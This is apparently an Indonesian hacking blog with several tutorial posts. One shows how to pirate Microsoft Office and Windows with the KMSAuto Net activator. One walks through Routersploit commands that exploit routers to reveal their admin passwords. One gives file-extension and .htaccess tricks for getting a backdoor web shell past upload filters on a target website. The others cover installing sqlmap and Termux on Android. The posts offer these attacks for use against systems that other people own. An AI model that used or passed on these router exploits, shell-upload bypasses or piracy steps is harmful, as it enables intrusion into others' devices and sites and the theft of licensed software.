Selamat Datang di Blog Idiot Attacker, Artikel terbaru Cara Aktifasi Microsoft Office 2016 Permanen Dengan KMSauto Net.

Cara Aktifasi Microsoft Office 2016 Permanen Dengan KMSauto Net

Rio Setyawan 8:35 PM
Cara Aktifasi Microsoft Office 2016 Permanen Dengan KMSauto Net
Selamat Pagi gan, sudah lama tidak buat artikel hehe. lama banget , terakhir update artikel bulan januari 2018, sekarang udah november 2018, hampir 1 thn hehe .

Oke langsung ke topik aja ya gan, tentang cara Aktifasi Microsoft Office 2016 Permanen Dengan KMSauto net, apa itu KMSauto Net ? KMSAuto Net adalah software yang berfungsi sebagai activator bagi Windows dan Microsoft Office.

Sebagian pengguna office, seperti word, powerpoint, excel dll tidak bisa membukanya atau menu masih terkunci, untuk membukanya harus mengeluarkan uang untuk  membeli key nya,
Cara Aktifasi Microsoft Office 2016 Permanen Dengan KMSauto Net


Nah dengan KMSauto Net ini kita tidak perlu membeli  alias GRATIS hehe

Tutorial.

Download KMSauto Net
  • Jalankan Setup.exe (run as admin)
  • Klik Activate dan pilih Activate Windows
  • Tunggu sampai muncul popup task scheduler dan pilih Yes
  • Selamat windows sudah teraktivasi dan akan selalu direset tanpa batas

 Untuk link download nya ada di bawah.
sekian , semoga bermanfaat.





Tutorial exploit router dengan Routersploit di android

Rio Setyawan 8:57 PM
Tutorial exploit router dengan Routersploit di android
Oke meneruskan artikel saya kemarin Cara install Routersploit di Android menggunakan Termux -  No Root,  jika belum membaca artikel saya kemarin bisa di baca dulu agar paham, 

Kalo artikel kemarin hanya tutorial install nya,  sekarang tutorial penggunaanya.

Sebelum memulai sedikit info tentang fitur-fitur Routersploit sbb.
  • Eksploitasi – modul yang mengambil keuntungan dari kerentanan
  • Diidentifikasicreds – modul dirancang untuk menguji kepercayaan terhadap layanan jaringan
  • Scanner – modul yang memeriksa apakah target rentan terhadap eksploitasi


Oke lanjut ke tutorialnya.
1. Pertama-tama buka dulu aplikasi Termux nya,

2. Pergi ke Directori Routersploit dengan ketikan perintah cd routersploit terus tekan enter

3. Selanjutnya ketikan perintah ./rsf.py lalu tekan enter

4. Kalau sudah ketikan perintah use scanners/autopwn lalu tekan enter
5. Selanjutnya setting target kalian dan port target nya

Ketikan perintah set target 192.168.151.1 lalu tekan enter (jika tidak terisi defaulnya 192.168.1.1)
set port 8080 lalu tekan enter (defaulnya 80)
set threads 10 lalu tekan enter (defaulnya 8)
Contohnya sbb
Tutorial exploit router dengan Routersploit di android

6. Jika sudah ketikan perintah run lalu tekan enter
Tunggu sampai kita mendapatkan password login routernya.

7. Jika sudah, tampilannya seperti ini (punya saya gagal untuk mengeskploitnya)
Tutorial exploit router dengan Routersploit di android

Nah, jika sukses kita akan mendapatkan kode explotnya.
Contoh : [+]  Device is vulnerable!
- exploits/asmax/ar_1004g_password_disclosure
8. Selanjutnya masukan kode exploits itu
Masukan perintah use exploits/asmax/ar_1004g_password_disclosure lalu tekan enter

9. Lalu ketikan perintah show options lalu tekan enter.
set target 192.168.151.1 lalu tekan enter.
Ketikan check lalu tekan enter
Ketik run lalu tekan enter

Maka login dan password akan muncul.

Semoga bermanfaat,  happy hacking

Cara install Routersploit di Android menggunakan Termux - No root

Rio Setyawan 10:52 PM
Cara install Routersploit di Android menggunakan Termux -  No root
Apa itu Routersploit??  Routersploit adalah tools linux yang bisa digunakan untuk exploitasi pada router guna mendapatkan password admin router tersebut tanpa melakukan bruteforce,

Cara install Routersploit di Android menggunakan Termux -  No root
Tools ini berjalan pada OS linux tapi kali ini kita akan menjalankanya di android,
Untuk menjalankanya di android kita menggunakan aplikasi tambahan yaitu Termux

Yang belum tau apa itu termux bisa membacanya di artikel saya sebelumnya
Download Termux -  Linux on Android

Kalau semua sudah siap saatnya install Routersploit nya

Sebelum Install Routersploit kita harus menginstall beberapa paket pendukung agar tools ini bisa di gunakan, dan berikut beberapa paket yg harus di install

apt install git
apt install python2
pip2 install requests

Jika semua sudah terinstall sekarang waktunya cloning script dari github dan install Routersploit

git clone https://github.com/reverse-shell/routersploit.git

cd routersploit

pip install -r requirements.txt termux-fix-shebang rsf.py

Tunggu proses pemasangan nya sampai selesai

Untuk menjalankanya cukup dengan perintah sbb
cd routersploit
./rsf.py

Mudah kan., untuk cara membobolnya tunggu artikel selanjutnya di blog Idiot Attacker ini.
Sekian dan terima kasih
Happy hacking

Trik Bypass upload shell Backdoor

Rio Setyawan 5:12 AM
Trik Bypass upload shell Backdoor
Mungkin dari kalian sering menjumpai web target yang sudah mendapatkan admin akses nya tapi gagal upload backdoor, salah satunya karena web target menolak upload file yang berektensi .php , nah disini ada sedikit trik untuk Bypass nya.

Dengan Rename nama Backdoor.

1.Upload shell berekstensi shell.jpg.PhP
Ingat, bukan .php tapi .PhP . Kadang server bingung dan akan di accept sebagai file .jpg , tapi ketika di eksekusi tetap akan terbaca file php.

2.Upload shell berekstensi shell.php;.jpg
Biasanya sih , server akan mengabaikan ekstensi setelah tanda " ; " sehingga file akan tetap terbaca .php

3.Upload shell berekstensi shell.php.test
Biasa nya ekstensi .test akan diabaikan , sehingga akan tetap dibaca sebagai file .php
4.Upload shell berekstensi shell.php.xxxjpg
ekstensi tidak jelas semacam .xxxjpg biasanya akan diabaikan server, dan akan dibaca sebagai file .php

5.Upload shell dengan ekstensi shell.php5 / php3
Biasanya cara ini yang jadi jurus pamungkas jika keempat cara diatas gagal. Kebanyakan server tetap akan mengeksekusi nya sebagai file .php

Dengan .htaccess

Cara nya sangat simple Upload file .htaccess di bawah ini di web target,  setelah itu upload shell kalian dengan ektensi png, jpg atau txt, Nantinya file .txt , png, dan jpg akan di baca oleh web server menjadi file php
AddType application/x-httpd-php .Arpns1986x
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt


Sampai disini dulu tutorialnya, tutorial selanjutnya menyusul, selengkapnya kalian praktekin sendiri, dan maaf jika ada kesalahan kata , Happy Hacking

Install SQLMAP di Android Dengan Termux

Rio Setyawan 10:49 PM
Install SQLMAP di Android Dengan Termux
Hallo gan sesuai janjiku di Artikel kemarin Download Termux - Linux On Android yaitu Install SQLMAP di Android Dengan Termux,

Apa itu Sqlmap?

SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database. [IDCA]
Baca Juga

Sqlmap itu dasarnya tools yang berjalan pada pengguna PC karena menggunakan bahasa pemograman python, tapi bisakah kita menjalankan nya di Android kita? Tentu saja bisa dengan menggunakan Aplikasi Android yang kita bahas di Artikel Kemarin yaitu Termux
Yang Belum Download Termux silahkan mampir dulu di Artikel saya yang kemarin Disini.

Oke Langsung saja ya gan.

Tutorial Install Sqlmap di Android


Pertama-tama Update Dulu
apt-get update

Install python2.7
apt-get install python2

Install git
apt-get install git

Clone SQLMap github
git clone https://github.com/sqlmapproject/sqlmap.git



Tunggu sampai proses cloning selesai

Pindah ke DIR sqlmap
cd sqlmap

Run SQLmap
python2 sqlmap.py

Install SQLMAP di Android Dengan Termux
Selasai sekarang kamu bisa menjalankan Sqlmap dengan Android kamu
Happy Hacking On Your Android :p


Sumber Referensi Surabaya Blackhat


Tag: sqlmap, menjalankan sqlmap di android, cara menggunakan sqlmap di android, run sqlmap on android, hack on android

Download Termux - Linux on Android

Rio Setyawan 7:53 PM
Download Termux - Linux on Android
Selamat Pagi gan, sudah lama gak pernah Update, hehe. Maklum PC Lagi rusak.
Langsung saja ya gan kali ini mau update tentang aplikasi Terminal emulator untuk android yaitu Termux.

Termux adalah terminal atau shell emulator untuk Android yang berguna untuk menjembatani interaksi antara pengguna dan sistem operasi dengan antarmuka baris perintah. Seperti Konsole atau Gnome-Terminal pada Linux Desktop.

Dari sekian banyak terminal emulator yang ada di Google Play Store, Termux merupakan terminal emulator terbaik menurut saya karena Termux juga menyediakan repositori paket yang telah di compile untuk beberapa jenis prosesor, siap dipasang dan tidak membutuhkan akses root. Namun perlu dicatat, Termux hanya dapat berjalan pada sistem Android dengan versi 5.0 ke atas.

Kalian Bisa Download Termux Di Google Playstore

install dan buka aplikasinya
Pada saat pertama kali di buka pastikan data internet di aktifkan karna untuk mendowload packagenya di butuhkan data internet .

Download Termux - Linux on Android
setelah selesai menginstall package kita langsung melakukan update dan upgrade packagenya perintahnya sebagai berikut.
apt update && apt upgrade
Setelah update dan upgrade barulah kita bisa menggunakanya
Untuk menginstall paket aplet gunakan perintah apt install atau apt-get install , bisa juga packages install .

install php
apt-get install php

install python
apt-get install python2

Tentunya kalian bisa juga install packages2 lain sprti curl , figlet dll . pokoknya hampir sama seperti terminal di PC Tinggal pelajari command2 linux lainnya aja .

Untuk memunculkan extra keys seperti ESC , CTRL , dll ( tekan volume up + Q )
Untuk lebih jelasnya kunjungi  https://termux.com/touch-keyboard.html

cara ini bukan membuat android kamu menjadi dualboot melainkan kita hanya menjalankan linux dalam lingkup package dari termux tersebut.
Artikel Berikutnya Install SQLMAP di Android dengan Termux.
Sekian dan terima kasih.


Sumber Artikel : SurabayaBLackhat.org & blog.dhocnet.info


Tag: terminal emulator, termux, linux di android, linux android, linux, android